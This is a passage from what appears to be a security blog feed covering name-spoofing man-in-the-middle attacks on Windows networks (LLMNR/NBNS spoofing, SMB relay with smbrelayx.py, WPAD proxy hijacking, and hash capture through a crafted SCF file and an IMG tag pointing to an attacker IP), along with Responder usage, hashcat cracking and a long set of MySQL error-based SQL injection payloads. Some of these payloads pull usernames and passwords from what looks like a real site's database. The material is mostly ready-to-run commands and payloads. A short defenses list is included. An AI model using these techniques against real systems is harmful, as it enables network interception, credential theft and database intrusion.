service for connection-oriented communication (port: 139/tcp)</li></ul><h4 id="NBNS"><a href="#NBNS" class="headerlink" title="NBNS"></a>NBNS</h4><p>The NetBIOS Name Service resolves NetBIOS names to their IP addresses; in most cases this means NetBIOS over TCP/IP.</p><p><img src="https://i.imgur.com/eA7fXEE.png" alt=""></p><p>When we ping a hostname or call socket.gethostbyname('hostname'), the name is looked up in order in the local cache, then LMHOSTS, then the WINS server, and finally by broadcasting a "Name Query" packet.</p><p><img src="https://i.imgur.com/rjQSub1.png" alt=""></p><h4 id="Nbtstat"><a href="#Nbtstat" class="headerlink" title="Nbtstat"></a>Nbtstat</h4><p>We can inspect the local NetBIOS name cache with the nbtstat command.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">NBTSTAT [ [-A IP address] [-c] [-n] [-R]]</div><div class="line"> -A (适配器状态) 列出指定 IP 地址的远程机器的名称表。</div><div class="line"> -c (缓存) 列出远程[计算机]名称及其 IP 地址的 NBT 缓存</div><div class="line"> -n (名称) 列出本地 NetBIOS 名称。</div><div class="line"> -R (重新加载) 清除和重新加载远程缓存名称表</div></pre></td></tr></table></figure><h4 id="SMBRelay"><a href="#SMBRelay" class="headerlink" title="SMBRelay"></a>SMBRelay</h4><p>SMB2<br>Server Message Block (SMB) is a protocol used mainly to share files, printers, serial ports and the like between computers. SMB2 runs on TCP ports 139 and 445.</p><p>It uses NTLMv2 authentication.</p><p><img src="https://i.imgur.com/fB6vgaV.png" alt=""></p><ol><li>Negotiate</li><li>Challenge</li><li>Authenticate</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Client (domain member) ----> Middle Attack (192.168.6.12) ----> Server(192.168.6.4)</div><div class="line"> !</div><div class="line"> !</div><div class="line"> V</div><div class="line">DC (192.168.6.2)</div></pre></td></tr></table></figure><blockquote><p>Note<br>On Windows Server 2008 R2 the "Digitally sign communications" setting must be turned off, otherwise smbrelayx.py fails with <strong>SMB SessionError: STATUS_ACCESS_DENIED({Access 
Denied}…</strong>. Alternatively, the SMB session key can be obtained through NETLOGON (CVE-2015-0005).</p></blockquote><p>Disabling signing in the registry:<br>HKLM\System\CurrentControlSet\Services\LanManServer\Parameters<br>RequireSecuritySignature REG_DWORD: 0 = Disabled</p><p>Tool used:<br>Impacket<br><a href="https://github.com/CoreSecurity/impacket" target="_blank" rel="external">https://github.com/CoreSecurity/impacket</a></p><p>The attacker relays the SMB request to Server and runs the command calc.exe:</p><p><code>python smbrelayx.py -h 192.168.6.4 -c "calc.exe"</code></p><p>Client, logged on with a valid account (usually a domain admin), runs from the command line:</p><p><code>dir \\192.168.6.12\c$</code></p><p><img src="https://i.imgur.com/0s7ImOr.png" alt=""></p><h4 id="SMB签名"><a href="#SMB签名" class="headerlink" title="SMB signing"></a>SMB signing</h4><p>You need a valid machine account name and its NTLM hashes, and you specify the DC with the -domain parameter.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">WIN-7JFKE9MFQQ7$:RUOS:00000000000000000000000000000000:FB55268036B7C0ACE6E417F2EF959C28</div></pre></td></tr></table></figure></p><p>Usage:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./smbrelayx.py -h 192.168.6.4 -c "calc.exe" -machine-account RUOS/WIN-7JFKE9MFQQ7\$ -machine-hashes LMHASH:NTHASH -domain DC</div></pre></td></tr></table></figure></p><p><img src="https://i.imgur.com/MQyVCej.png" alt=""></p><h4 id="BadTunnel"><a href="#BadTunnel" class="headerlink" title="BadTunnel"></a>BadTunnel</h4><p>Answering name queries across network segments.</p><h3 id="WPAD"><a href="#WPAD" class="headerlink" title="WPAD"></a>WPAD</h3><p>WPAD (Web Proxy Auto Discovery) lets the browser locate the PAC file through DHCP and DNS queries.</p><p>When "Automatically detect settings" is enabled in the Connections tab of IE Internet Options, IE looks for the wpad.dat file in the following ways:</p><ul><li>DHCP (option 252)</li><li>DNS A record query</li><li>NetBios</li><li>LLMNR</li></ul><p>Creating WPAD in DNS (cannot be resolved?)</p><p><a href="https://technet.microsoft.com/en-us/library/cc995062.aspx" target="_blank" 
rel="external">https://technet.microsoft.com/en-us/library/cc995062.aspx</a></p><p><img src="https://i.imgur.com/FBblcZW.png" alt=""></p><p>Proxy auto-config<br>A proxy auto-config (PAC) file defines how an application automatically selects the appropriate proxy server for a given URL. It is conventionally named proxy.pac; the WPAD standard uses wpad.dat.</p><p>A simple example of a PAC file:<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="keyword">if</span> (url== <span class="string">'http://www.baidu.com/'</span>) <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line"> <span class="keyword">if</span> (host== <span class="string">'twitter.com'</span>) <span class="keyword">return</span> <span class="string">'SOCKS 127.0.0.10:7070'</span>;</div><div class="line"> <span class="keyword">if</span> (dnsResolve(host) == <span class="string">'10.0.0.100'</span>) <span class="keyword">return</span> <span class="string">'PROXY 127.0.0.1:8086;DIRECT'</span>;</div><div class="line"> <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line">}</div></pre></td></tr></table></figure></p><h4 id="如何攻击?"><a href="#如何攻击?" 
class="headerlink" title="How is it attacked?"></a>How is it attacked?</h4><p>The client first queries the IP of the WPAD name, then downloads the wpad.dat file to configure the browser proxy.</p><p>WPAD server<br><a href="http://192.168.6.12/wpad.dat" target="_blank" rel="external">http://192.168.6.12/wpad.dat</a></p><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="comment">// URLs within this network are accessed directly</span></div><div class="line"> <span class="keyword">if</span> (isInNet(host, <span class="string">"127.0.0.1"</span>, <span class="string">"255.255.255.0"</span>))</div><div class="line"> {</div><div class="line"> <span class="keyword">return</span> <span class="string">"DIRECT"</span>;</div><div class="line"> }</div><div class="line"><span class="comment">// an HTTP proxy is listening on 192.168.6.1:8080</span></div><div class="line"> <span class="keyword">return</span> <span class="string">"PROXY 192.168.6.1:8080; DIRECT"</span>;</div><div class="line">}</div></pre></td></tr></table></figure><p>MSF NBNS response attack<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">msf > use auxiliary/spoof/nbns/nbns_response</div><div class="line">msf auxiliary(nbns_response) > set regex WPAD</div><div class="line">msf auxiliary(nbns_response) > set spoofip 192.168.6.12</div><div class="line">msf auxiliary(nbns_response) > 
run</div></pre></td></tr></table></figure></p><p>When IE accesses a link it queries WPAD via NBNS, and the attacking machine answers with the IP 192.168.6.12. IE automatically downloads the wpad.dat file and caches the address in the registry key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]; from then on IE's traffic passes through our proxy server.</p><p><img src="https://i.imgur.com/Cah3y8L.png" alt=""></p><h4 id="抓取HASH"><a href="#抓取HASH" class="headerlink" title="Capturing hashes"></a>Capturing hashes</h4><p>Net-NTLM hashes are used for network authentication. Unlike NTLM hashes, they cannot be used for Pass-The-Hash attacks. A Net-NTLMv2 hash has the following format.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin::RUOS:1122334455667788:d5006d468c997ca37845df3d88316477:0101000000000000eaca11bf5f6ed301ca362b9cc58cc07500000000020000000000000000000000</div></pre></td></tr></table></figure><p>Start the SMB service</p><p><img src="https://i.imgur.com/ZC6016i.png" alt=""></p><blockquote><p>Note<br>auxiliary/server/capture/http_ntlm: accessing it over HTTP pops up the Windows security authentication dialog</p></blockquote><p>IMG tag<br><code><img src="\\192.168.6.12\1.jpg" /></code></p><p>Place test.scf in a shared directory<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[Shell]</div><div class="line">Command=2</div><div class="line">IconFile=\\192.168.6.12\test</div><div class="line">[Taskbar]</div><div class="line">Command=ToggleDesktop</div></pre></td></tr></table></figure></p><p>When a user opens a web page embedding that IMG tag or browses a shared directory containing the test.scf file, the machine automatically sends an authentication request to 192.168.6.12.</p><p><img src="https://i.imgur.com/rYznNPD.png" alt=""></p><h4 id="Crack-hash"><a href="#Crack-hash" class="headerlink" title="Crack hash"></a>Crack hash</h4><ul><li>Dictionary cracking (not recommended)<br>hashcat64 -m 5600 -D 1 --show john_hashes_netntlmv2 example.dict</li><li>Rainbow tables</li></ul><h3 id="自动化攻击工具"><a href="#自动化攻击工具" class="headerlink" title="Automated attack tools"></a>Automated attack tools</h3><ul><li><p>Inveigh<br>Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and 
man-in-the-middle tool<br><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank" rel="external">https://github.com/Kevin-Robertson/Inveigh</a></p></li><li><p>Responder<br>LLMNR/NBT-NS/mDNS Poisoner<br><a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="external">https://github.com/SpiderLabs/Responder</a></p></li><li><p>PS>Attack<br><a href="https://github.com/jaredhaight/PSAttack" target="_blank" rel="external">https://github.com/jaredhaight/PSAttack</a></p></li></ul><h4 id="Responder"><a href="#Responder" class="headerlink" title="Responder"></a>Responder</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./Responder.py -I eth0 -wrfvb -u 192.168.6.1:8888</div></pre></td></tr></table></figure><p>When Responder starts it brings up WPAD, SMB, WEB PROXY and other services and answers every name resolution with the Responder server's IP. A victim browsing web pages through the Responder proxy gets HTML code injected (-b parameter) and is shown an authentication phishing page. With Serve-Exe = On, every exe the client downloads is replaced by the program specified in ExeFilename.</p><p>Because it also answers fully qualified domain names automatically, far too much information is displayed, so we modify NBTNS.py to ignore them.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># NBT_NS Server class.</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">NBTNS</span><span class="params">(BaseRequestHandler)</span>:</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">handle</span><span class="params">(self)</span>:</span></div><div class="line">data, socket = self.request</div><div class="line">Name = Decode_Name(data[<span class="number">13</span>:<span class="number">45</span>])</div><div class="line"><span class="keyword">if</span> re.match(<span 
class="string">r'^([A-Z0-9]+(-[A-Z0-9]+)*\.)+[A-Z]{2,}$'</span>, Name):</div><div class="line"><span class="comment">#print "this is a domain: " + Name</span></div><div class="line"><span class="keyword">return</span> <span class="keyword">None</span></div></pre></td></tr></table></figure><p><img src="https://i.imgur.com/tpHTDCW.png" alt=""></p><h3 id="防范"><a href="#防范" class="headerlink" title="Defenses"></a>Defenses</h3><ul><li>Disable LLMNR<br>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f<br>reg add "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f</li><li>Disable NetBIOS</li><li>Enable SMB signing</li></ul><h3 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h3><ul><li><a href="https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt" target="_blank" rel="external">https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt</a></li><li><a href="https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python" target="_blank" rel="external">https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a></li><li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf" target="_blank" rel="external">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf</a></li><li><a href="http://www.ubiqx.org/cifs/SMB.html" target="_blank" rel="external">http://www.ubiqx.org/cifs/SMB.html</a></li></ul>]]></content>
<summary type="html">
<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="Name spoofing man-in-the-middle attacks"></a>Name spoofing man-in-the-middle attacks</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR)</p>
<p>When we run <code>ping WEBTST01</code>, an LLMNR request is sent to resolve WEBTST01. All LLMNR packets are sent to the multicast address 224.0.0.252 (MAC: <code>01:00:5E:00:00:FC</code>), and the responding host answers the query by unicast.</p>
<p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p>
<h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p>
<ul>
<li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li>
<li>QR - Query/Response.</li>
<li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li>
<li>C - Conflict.</li>
<li>TC - TrunCation.</li>
<li>T - Tentative.</li>
<li>Z - Reserved for future use.</li>
<li>RCODE - Response code.</li>
<li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li>
<li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li>
<li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li>
<li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li>
</ul>
</summary>
</entry>
<entry>
<title>Database hacking</title>
<link href="http://ruos.org/2017/11/17/%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%91%E5%AE%A2/"/>
<id>http://ruos.org/2017/11/17/数据库黑客/</id>
<published>2017-11-17T05:46:15.000Z</published>
<updated>2018-01-19T08:53:43.453Z</updated>
<content type="html"><![CDATA[<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>MYSQL downloads for every version<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p><h3 id="报错注入"><a href="#报错注入" class="headerlink" title="Error-based injection"></a>Error-based injection</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="Commonly used error functions"></a>Commonly used error functions</h4><p>FLOOR(X) rounds down to the nearest integer</p><p>select FLOOR(12.2) -> 12</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span 
class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</div></pre></td></tr></table></figure><p>XML document support</p><p>ExtractValue(): 32-character length limit</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure><p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~’</p><p>UpdateXML()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure><p>[Err] 1105 - XPATH 
syntax error: ‘~root@localhost~‘</p><a id="more"></a><p>geometrycollection()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> geometrycollection((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multipoint()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>polygon()</p><figure class="highlight sql"><table><tr><td 
class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multipolygon()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>linestring()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span 
class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> linestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multilinestring()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>exp(), for versions 5.5.5 and above</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span 
class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</div></pre></td></tr></table></figure><h3 id="实例"><a href="#实例" class="headerlink" title="Examples"></a>Examples</h3><p>error-based<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">lang=en') AND EXTRACTVALUE(1267,CONCAT(0x5c,0x7170627871,(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">1267</span>=<span class="number">1267</span>) <span class="keyword">THEN</span> <span class="number">1</span> <span class="keyword">ELSE</span> <span class="number">0</span> <span class="keyword">END</span>)),<span class="number">0x7170707671</span>)) <span class="keyword">AND</span> (<span class="string">'PeJH'</span>=<span class="string">'PeJH</span></div><div class="line"><span class="string">name=b'</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, <span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">string</span> <span class="keyword">FROM</span> t <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))) <span class="keyword">and</span> a =<span class="string">'1</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, concat(0x7e,(SELECT string FROM t limit 1,1)) )</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and 
extractvalue(1, (SELECT string FROM t limit 1,1) )</span></div><div class="line"><span class="string">lang=en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">7</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'XTGg'</span>=<span class="string">'XTGg</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">200</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">where</span> username=<span class="string">'mihmd'</span> ))) <span class="keyword">and</span> (<span class="number">1</span>=<span class="string">'1;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x5c</span>,<span class="number">0x716b787871</span>,(<span class="keyword">SELECT</span> <span 
class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(cIpAddress <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.admin <span class="keyword">ORDER</span> <span class="keyword">BY</span> email <span class="keyword">LIMIT</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure></p><p>//cut string<br>SELECT MID(ColumnName, Start [, Length])<br>CAST(value as type);<br>CHAR<br>SIGNED<br>CONVERT(value, type);<br>LIMIT 18,1 //ahmad</p><p>left(‘ruo’,1) = ‘r’<br>substr(‘ruo’,1,1) = ‘r’<br>ascii(‘r’) = 114<br>mid(‘ruo’,1,1) = ‘r’</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div 
class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div></pre></td><td class="code"><pre><div class="line">(<span class="keyword">SELECT</span> </div><div class="line"><span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) </div><div class="line"><span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">3</span>,<span class="number">1</span>)</div><div class="line"></div><div class="line">lang=en<span class="string">') AND </span></div><div class="line"><span class="string">EXTRACTVALUE(4230,</span></div><div class="line"><span class="string">CONCAT(0x34,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM MTN2012.user ORDER BY id LIMIT 18,1))</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string">AND ('</span>JonM<span class="string">'='</span>JonM;</div><div class="line"></div><div class="line">en') AND EXTRACTVALUE(4230,CONCAT(0x5c,0x716b787871,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span 
